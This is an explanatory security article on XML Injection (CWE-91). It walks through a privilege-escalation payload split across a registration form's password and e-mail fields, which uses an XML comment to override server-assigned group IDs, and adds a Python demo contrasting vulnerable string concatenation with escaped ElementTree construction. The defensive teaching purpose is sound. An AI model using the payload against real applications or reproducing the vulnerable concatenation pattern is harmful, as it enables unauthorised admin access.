XML Injection [CWE-91] — The Hacktivists

1. Description
………………………………

A variety of popular software (Apache Tomcat, OpenOffice, Microsoft Office, IM Jabber, Zend Framework, IBM WebSphere) uses eXtensible Markup Language (XML) to communicate with back-end servers, authenticate users, store information, etc. XML is also the data format of many protocols, such as XML-RPC, SOAP, Jabber, WDDX, and XMI. XML Injection (CWE-91) occurs when an application builds an XML document by concatenating user-controlled input into it without escaping or validating that input, so that markup supplied by the user is interpreted as document structure instead of character data. The example below walks through the weakness in a PHP application that stores its user accounts in an XML file.

Assume the application keeps its accounts in the following file. Users in group 1 are administrators; ordinary users are placed in group 10:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>admin</username>
<password>VeryStrongP@ssw0rd</password>
<userid>1</userid>
<groupid>1</groupid>
<mail>admin@mysite.com</mail>
</user>
<user>
<username>user</username>
<password>weakpass</password>
<userid>500</userid>
<groupid>10</groupid>
<mail>user@mysite.com</mail>
</user>
</users>
New accounts are created through the form below. The server takes the three submitted values, assigns the new account userid 500 and groupid 10 itself, and appends a new <user> element to the file by plain string concatenation, without escaping the input:

<form name="frm" method="post" action="">
<p>Username: <input type="text" name="login"></p>
<p>Password: <input type="password" name="passwd"></p>
<p>Email: <input type="text" name="email"></p>
<p><input type="submit" value="Log In" name="btLogin"></p>
</form>
An attacker registers with the following values. The payload is split across two fields: the password field closes its own <password> element and opens an XML comment, and the e-mail field closes that comment and supplies attacker-chosen <userid> and <groupid> elements before the e-mail address (the application appends the closing </mail> tag itself):

Username: attacker
Password: password</password><!--
E-mail: --><userid>10000</userid><groupid>1</groupid><mail>attacker@attacker.com
The application writes the following document. The comment opened in the password field swallows the server-supplied userid and groupid, and the values from the e-mail field take their place; the result is still well-formed XML:

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>admin</username>
<password>VeryStrongP@ssw0rd</password>
<userid>1</userid>
<groupid>1</groupid>
<mail>admin@mysite.com</mail>
</user>
<user>
<username>user</username>
<password>weakpass</password>
<userid>500</userid>
<groupid>10</groupid>
<mail>user@mysite.com</mail>
</user>
<user>
<username>attacker</username>
<password>password</password> <!--
<userid>500</userid>
<groupid>10</groupid>
<mail>--><userid>10000</userid><groupid>1</groupid><mail>attacker@attacker.com</mail>
</user>
</users>
When the application loads the file with PHP's SimpleXML, the comment is carried along as an empty element and the injected values are read as the attacker's real userid and groupid. The attacker now belongs to group 1, the administrators' group (print_r output):

SimpleXMLElement Object
(
[user] => Array
(
[0] => SimpleXMLElement Object
(
[username] => admin
[password] => VeryStrongP@ssw0rd
[userid] => 1
[groupid] => 1
[mail] => admin@mysite.com
)

[1] => SimpleXMLElement Object
(
[username] => user
[password] => weakpass
[userid] => 500
[groupid] => 10
[mail] => user@mysite.com
)

[2] => SimpleXMLElement Object
(
[username] => attacker
[password] => password
[comment] => SimpleXMLElement Object
(
)

[userid] => 10000
[groupid] => 1
[mail] => attacker@attacker.com
)
)

)
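To make the mechanism concrete, here is an added example in Python that is not code from the original article or from any of the products it names. It reproduces the registration step twice: add_user_vulnerable builds the new <user> element by string concatenation, as the application above does, while add_user_safe builds it through the ElementTree API, which escapes "<", ">" and "&" in text nodes so the input can only ever be character data. A lookup then shows which group each version assigns to the attacker. The users file, the attacker's three field values and all function names are constructed for this example; the fixed userid 500 and groupid 10 given to new accounts are taken from the page's resulting XML.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the users file from the article, before the attacker registers.
USERS_XML = """<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user><username>admin</username><password>VeryStrongP@ssw0rd</password><userid>1</userid><groupid>1</groupid><mail>admin@mysite.com</mail></user>
<user><username>user</username><password>weakpass</password><userid>500</userid><groupid>10</groupid><mail>user@mysite.com</mail></user>
</users>
"""

# The three values the attacker types into the registration form (username, password, e-mail).
ATTACKER_INPUT = (
    "attacker",
    "password</password><!--",
    "--><userid>10000</userid><groupid>1</groupid><mail>attacker@attacker.com",
)


def add_user_vulnerable(xml_text, username, password, mail):
    """Vulnerable variant (hypothetical): the new <user> is assembled by string
    concatenation, so any markup in the input becomes document structure.
    The server assigns userid 500 and groupid 10 to every new account."""
    user = (
        f"<user><username>{username}</username><password>{password}</password>"
        f"<userid>500</userid><groupid>10</groupid><mail>{mail}</mail></user>"
    )
    return xml_text.replace("</users>", user + "\n</users>")


def add_user_safe(xml_text, username, password, mail):
    """Hardened variant (hypothetical): the new <user> is built through the DOM API.
    ElementTree serialises text nodes with '<', '>' and '&' escaped, so the
    attacker's markup is stored as literal characters inside <password> and <mail>."""
    root = ET.fromstring(xml_text)
    user = ET.SubElement(root, "user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", "500"), ("groupid", "10"), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(root, encoding="unicode")


def lookup(xml_text, username):
    """What a login routine sees: the named user's child elements as a dict.
    ElementTree's default parser drops XML comments, so the commented-out
    server values in the vulnerable document never reach the application."""
    root = ET.fromstring(xml_text)
    for user in root.findall("user"):
        if user.findtext("username") == username:
            return {child.tag: child.text for child in user}
    return None


def demo():
    """Returns the attacker's parsed record under both variants."""
    vuln = lookup(add_user_vulnerable(USERS_XML, *ATTACKER_INPUT), "attacker")
    safe = lookup(add_user_safe(USERS_XML, *ATTACKER_INPUT), "attacker")
    return vuln, safe


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable:", vulnerable)   # groupid '1': the attacker is now in the admin group
    print("hardened:  ", hardened)     # groupid '10': the payload is plain text in <mail>
```

Note that the vulnerable document is well-formed, so a well-formedness check after writing would not catch the injection; the fix is to stop treating input as markup at the point where the document is built (a serialising API or an equivalent escaping routine), and, independently, to validate the file against its expected schema so that a <user> with out-of-order or duplicated children is rejected. Rejecting "<" in the e-mail field alone is not sufficient, because the password field carries the opening half of the payload.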

2. Potential impact
………………………………

As for any code injection, the potential impact depends on the vulnerable application and its functionality. An attacker might be able to gain access to potentially sensitive information, modify or delete data, and elevate privileges within the application, as in the example above, where the injected user ends up in the administrators' group. If the injected document is later processed by a parser that resolves external entities, XML Injection can be chained into an XXE attack to read local files, reach internal network hosts, perform port scans, etc. In a worst-case scenario, this weakness could result in a full system compromise.

3. Attack patterns
………………………………

According to CAPEC, there are the following attack patterns for this weakness:

4. Affected software
………………………………

Extensible Markup Language is integrated into a variety of client/server applications and protocols. Software that uses XML-based protocols might be potentially vulnerable to this weakness.

5. Severity and CVSS Scoring
………………………………

XML injection weaknesses can affect the confidentiality, integrity, and availability of the application. Depending on the application's functionality, an attacker might be able to read, modify or delete information stored in XML files, or even elevate privileges within the application.
